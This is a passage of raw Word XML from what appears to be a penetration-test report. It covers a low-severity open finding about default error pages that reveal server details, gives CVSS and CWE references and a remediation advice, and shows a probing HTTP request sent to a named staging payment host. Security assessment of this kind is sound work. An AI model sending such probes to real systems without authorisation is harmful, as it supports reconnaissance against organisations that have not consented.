              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w14:paraId="5E518145" w14:textId="77777777" w:rsidTr="00DB64A3">
              <w:trPr>
                <w:trHeight w:val="2129"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="5853C099" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="20108746" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Fri, 31 May 2019 17:43:49 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="35224C2A" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Last-Modified: Wed, 22 May 2019 13:37:09 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7FD0C8E3" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>ETag</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: "18550-3f4-5897a0fe16b40"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="07B7A04F" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept-Ranges: bytes</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2A8DA348" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 1012</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="16BDDDEC" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Type: text/html</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0CF75545" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="078EE3D4" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>&lt;!DOCTYPE html&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0FC6F27E" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="77D9286D" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="00DB64A3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13FB2D54" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2606A8EA" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="309CB9AB" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="228B22"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="688AD1BA" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="15" w:name="_Toc10703675"/>
            <w:r>
              <w:t>L2</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Error Conditions, Return Values, Status Codes</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="15"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0F6607C4" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="078B9A95"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11B60838" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId32" w:anchor="CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="00B358C4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>3.1</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="62B68031" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="58449F40"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5B9E4B2A" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-389: Error Conditions, Return Values, Status Codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="43553420" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E60D443"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33BBB681" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00021BA3" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Systemic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="3959989C" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="36BD917B"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2182FE11" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>If a function in a product does not generate the correct return/status codes, or if the product does not handle all possible return/status codes that could be generated by a function, then security issues may result.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="2467932A" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D40689F"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Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AFA6E55" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00502268" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Generate a generic error page to handle 404 errors, as well as other unexpected server responses. Ensure that the generic error message page r</w:t>
            </w:r>
            <w:r w:rsidRPr="00BE068A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>emove</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00BE068A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> any platform or technology-related information from HTTP responses</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="17B41686" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="34857578"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Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7EF853CF" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="7AF40E43" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D0E2ED" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRDefault="00803C34" w:rsidP="00803C34">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below image </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>demonstrates</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> the applications use of a default error message page when encountering a 500 error message response. In this message, details regarding the server type is reflected to the user. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529E8C8B" w14:textId="77777777" w:rsidR="0071699B" w:rsidRPr="0071699B" w:rsidRDefault="0071699B" w:rsidP="00803C34">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0071699B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="0071699B" w:rsidRPr="0071699B" w14:paraId="07F63622" w14:textId="77777777" w:rsidTr="0071699B">
              <w:trPr>
                <w:trHeight w:val="1322"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="27828072" w14:textId="77777777" w:rsidR="0071699B" w:rsidRPr="0071699B" w:rsidRDefault="0071699B" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>GET /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gofundhip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/~</w:t>
                  </w:r>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="548667FC" w14:textId="77777777" w:rsidR="0071699B" w:rsidRPr="0071699B" w:rsidRDefault="0071699B" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="43500ED4" w14:textId="77777777" w:rsidR="0071699B" w:rsidRPr="0071699B" w:rsidRDefault="0071699B" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0</w:t>
                  </w:r>
                </w:p>
